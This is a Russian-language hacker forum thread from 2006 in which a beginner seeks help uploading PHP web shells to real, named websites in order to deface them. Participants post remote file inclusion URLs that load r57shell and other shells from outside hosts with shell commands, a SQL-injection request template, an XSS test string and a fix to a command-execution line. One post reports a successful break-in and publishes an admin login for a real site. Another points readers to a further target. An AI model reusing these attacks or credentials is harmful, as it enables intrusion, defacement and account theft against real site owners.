Вопрос по shell

Discussion in 'PHP' started by IIAHbI4, 3 Sep 2006.

  1. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    Никак не получаеться шелл залить,вернее получаеться но както криво,вроде заливка идёт,но ничего не происходит
    вот ссылка http://df.md/index.php?act=http://arry1.narod.ru/shell
    или http://df.md/index.php?act=http://fordestroy.narod.ru/r57shel,
    а если можно и тутор дайте,хочу Дефес зделать вот ..всё вродеб...
    спс заранее.
     
  2. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    Ps юзал поиск не нарыл ничего,щас в видео бибиотеке гляну.
     
  3. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    Не грузится у меня чет ни df.md, ни твои сайты на народе...
     
  4. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    странно.... http://www.df.md
     
  5. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Если с шеллом не получится попробуй SQL-запрос выполнить в галерее

    PHP:
    GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image IDHTTP/1.1
    Host
    адрес сайта
    User
    -Agent’sql commands
    Keep
    -Alive300
    Cookie
    твоя сессия
     
  6. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    мммм.....http://arry1.narod.ru/shell.php разве не грузиться?
     
  7. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    неа не вышло...но спс за поддержку +1 тебе)
     
  8. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    слуш как проверить валидность шела?этого http://arry1.narod.ru/shell
    просо думал пчп иньекцию,а потом радмином...
     
  9. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l
    где 1.тхт :
    а пишет "parse error" в чём ошибка?
     
  10. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    потом ввел http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/shell.php&c=ls%20-l
    и ваще какаята бредуха Оо
    поможет ктото?
     
  11. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Да нифига не следовательно!
    смотри: http://www.grailcoat.com/index.php?p=%3Cscript%3Ealert()%3C/script%3E
    выскакивает алерт, это пасивная xss а ты туда просто ссылку вставляеш! так ничего не получиться!
     
    #11 nc.STRIEM, 3 Sep 2006
    Last edited: 3 Sep 2006
  12. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    УРААААААААААААААААААААААААААА! взломан )))))
    ошибку нашел)))))
     
    1 person likes this.
  13. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    нет там по другому надо было зделать )))
     
    1 person likes this.
  14. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    вот скриники http://slil.ru/23085371 )
     
  15. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    чёт http://www.g4.com.tw/index.php?p=http://rst.void.ru/download/r57shell.txt сюда не заливаеться ремвьюв с http://arry1.narod.ru/remview.php Оо
    ребята реально помогите ктото,я первый раз пытаюсь чтото взломать (цель дефейс)
    и нужна помошь,вспомните себя в начале... плз)
    ***чтобы не зделал пишет "Доступ запрещён!"
     
    #15 IIAHbI4, 3 Sep 2006
    Last edited: 3 Sep 2006
  16. zerg

    zerg Elder - Старейшина

    Joined:
    5 Mar 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    system($_GET['c']};
    нетакая скобка system($_GET['c']);
     
    1 person likes this.
  17. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    всё нормально инклудить, вот пример с удаленным файлом :
    _http://www.grailcoat.com/index.php?p=http://rst.void.ru/download/r57shell.txt =)
     
  18. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    по поводу http://www.grailcoat.com/,там редактировать недьзя...,написал в строке выполнить /admin.php там взял пасс (кстати вот он пас от админики сайта юзер grail
    пасс grailPASS123 но админка невалидная ))))
    ЗЫ: спасибо большое gemaglab1n,единственный чел который помог и обьяснил что к чему)
     
  19. Sw%00p

    Sw%00p Banned

    Joined:
    13 Apr 2006
    Messages:
    47
    Likes Received:
    8
    Reputations:
    8
    чё вы бедный http://www.grailcoat.com/ мучаете
    вот поиграйтесь с комуняками
    http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php
     
  20. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    )))) :D